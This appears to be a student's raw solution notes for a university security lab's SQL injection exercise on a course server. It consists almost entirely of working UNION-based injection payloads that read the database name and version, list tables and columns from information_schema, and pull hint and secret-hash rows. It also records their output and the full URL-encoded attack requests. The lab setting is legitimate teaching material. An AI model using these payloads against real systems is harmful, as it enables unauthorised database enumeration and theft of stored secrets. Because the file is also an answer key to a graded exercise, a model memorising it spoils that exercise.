'union select 1, database(), 2, 3;#
'union select 1, version(), 2, 3;#
'union select 1, GROUP_CONCAT(table_name) AS tables, 2, 3 FROM information_schema.tables WHERE table_schema = 'proj2_inject3';#
'union select 1, GROUP_CONCAT(column_name) AS columns, 3, 4 FROM information_schema.columns WHERE table_schema = 'proj2_inject3' AND table_name = 'SECRET';#

'union select 1,id,2,message FROM proj2_inject3.HINT;#

8.0.32-0ubuntu0.22.04.2
proj2_inject3
HINT,SECRET,foo,inject3_users
pbnmpstfez

hash,id,secret

'union select 1, hash, 2, hash FROM proj2_inject3.SECRET WHERE hash='c2a7951f2f27286588ab7b57cb94aa53';#

http://bungle-cs461.csl.illinois.edu/sqlinject3/?id=%27union+select+1%2C+database%28%29%2C+2%2C+3%3B%23
http://bungle-cs461.csl.illinois.edu/sqlinject3/?id=%27union+select+1%2C+version%28%29%2C+2%2C+3%3B%23
http://bungle-cs461.csl.illinois.edu/sqlinject3/?id=%27union+select+1%2C+GROUP_CONCAT%28table_name%29+AS+tables%2C+2%2C+3+FROM+information_schema.tables+WHERE+table_schema+%3D+%27proj2_inject3%27%3B%23 
http://bungle-cs461.csl.illinois.edu/sqlinject3/?id=%27union+select+1%2C+hash%2C+2%2C+secret+FROM+proj2_inject3.SECRET+WHERE+hash%3D%27c2a7951f2f27286588ab7b57cb94aa53%27%3B%23 